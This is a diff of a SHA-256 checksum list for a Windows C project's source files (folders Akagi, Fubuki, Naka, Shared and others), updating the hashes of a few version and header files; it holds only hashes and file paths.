+9302023437c9a80e2d8910f6e9ffa24ece680278653ebef6247acfc1e21e64a6 *Source\Akagi\methods\methods.h f220dbc1bb1e525e3adb76f0d1e9ac3237851bcbb55e7fd350288ef492116756 *Source\Akagi\methods\rinn.c 244cba3a74291e324964cfb40c153a00426b0e1f2fcb3f02ac7063e9915e52d8 *Source\Akagi\methods\rinn.h c204e44cffb51d95128971ec8b31e668e3b4f50ba3f4082c36ced76c2b30bc63 *Source\Akagi\methods\shellsup.c 
@@ -83,7 +83,7 @@ beb7d48597345d0109ce51c7452292ba6e970eb8ed5f716ec035087aa3f045b3 *Source\Akagi\p a65a782ee8e6ace52ce6e51a64220618ca6057cd0de9c306301ef7db6ce4473d *Source\Akatsuki\dllmain.c e10acf379efd906f8bf06a28e3b0b5598618c109c8a30f43e831b42f6aaf1950 *Source\Akatsuki\export.def 4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d *Source\Akatsuki\resource.h -b506b75f27c926e96400505f1c4dba6309b81283eac4bd38d7ee54c0e4aa43c6 *Source\Akatsuki\version.rc +4be964507603af178e31d7cbdb373e4bd6cc8c405be07e94f3f0d1217047515a *Source\Akatsuki\version.rc ed9e60aeb6f2426647cafd1c1a495d19735a977537d4ab188736f2f4dac5b5d4 *Source\Fubuki\dll.vcxproj 119a274dc329b1d3bc94ee836fc7a18612faa26a517ad04fc3f95cc548f2b1a1 *Source\Fubuki\dll.vcxproj.filters f0b8b0d1d5b85c4324c8cbb21d94dd8db69fd21bb5e37491bbd6aa2297fa0fc7 *Source\Fubuki\dll.vcxproj.user 
@@ -95,18 +95,18 @@ bbc77818711a5f5152b99ca50cb018575ce05ff59859c45eb4bb7353d86daca8 *Source\Fubuki\ 4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d *Source\Fubuki\resource.h 4aa24c1115cc3ed71027f760c7564357c162a09de58d75b5e9037cd869fb2a8a *Source\Fubuki\uihacks.c 73e735426c5fab97a7289a7a57bc8bb21bce7b2b1995ae076c41027780ed88c9 *Source\Fubuki\uihacks.h -ebceab69aab14e266650ff14dde76f5c0e65e38779ed868b76c3960310a2a8f7 *Source\Fubuki\version.rc +c8baef1a5f32ab37d3883d18fd9d9ddfa6a0729472960892eecf2e8d149ab167 *Source\Fubuki\version.rc b419f6b7b8d24dc61e7473092a8326720ef54e1f65cc185da0c6e080c9debb94 *Source\Fubuki\winmm.h f66280e29c2116d4b83f2c6899d8caf432f7a4d1ccc4e4cf4e72b05d0fbd1f25 *Source\Kamikaze\Kamikaze.msc d090766c75d998b019d651fbb0c04112c6feb0f754628751682708e13baf2744 *Source\Kamikaze\Launcher.html -f5e85b52a96d196e4131f145357153f74318f612657025f311832573f1404c9a *Source\Naka\main.c +e54acaf84b54afaa2320803e0928ce9fbc19d8be3e8df4051b88f1b19cd836a5 *Source\Naka\main.c 4479c31a428b0672245b2eff026be202998a4f146ab90cd06ce44412a20bf462 *Source\Naka\naka.h 2e13d6847d5f730e7fcbb4a720614448cb364fc8df5dc0ed1694a63cc355b2e3 *Source\Naka\Naka.vcxproj 175c9fc0c7046d006a6db698144fab3b40bd191e15617e7fba417a466c3a0b6f *Source\Naka\Naka.vcxproj.filters e67d285ac080ed3a22453a79f4390dfb1b5b131569aa53a2cd2502c4b5a69221 *Source\Naka\Naka.vcxproj.user 893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Shared\cmdline.c bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Shared\cmdline.h -70302e7507ec5beb4959b70a4d91ac4a40b09f2be3e4025ffe166cf824e77857 *Source\Shared\consts.h +fc2b0b243e1d7bf63e3f81fbd94d8bc578b7ad0b9fe69843a8e0168b2f57a9a4 *Source\Shared\consts.h 01c5aada277c3a7a138ab7c31beda0decee8ec28fe7525e43ca524b2b0270213 *Source\Shared\ldr.c b22c6d2722fa9e917746502fd4615d28b9c889d7288fc737315150e0ae40ee6f *Source\Shared\ldr.h 133f71bd8d6d4ca80a9a542c2492ba9a65e05b0cfa681a85dd05d9cf998a1bb4 *Source\Shared\libinc.h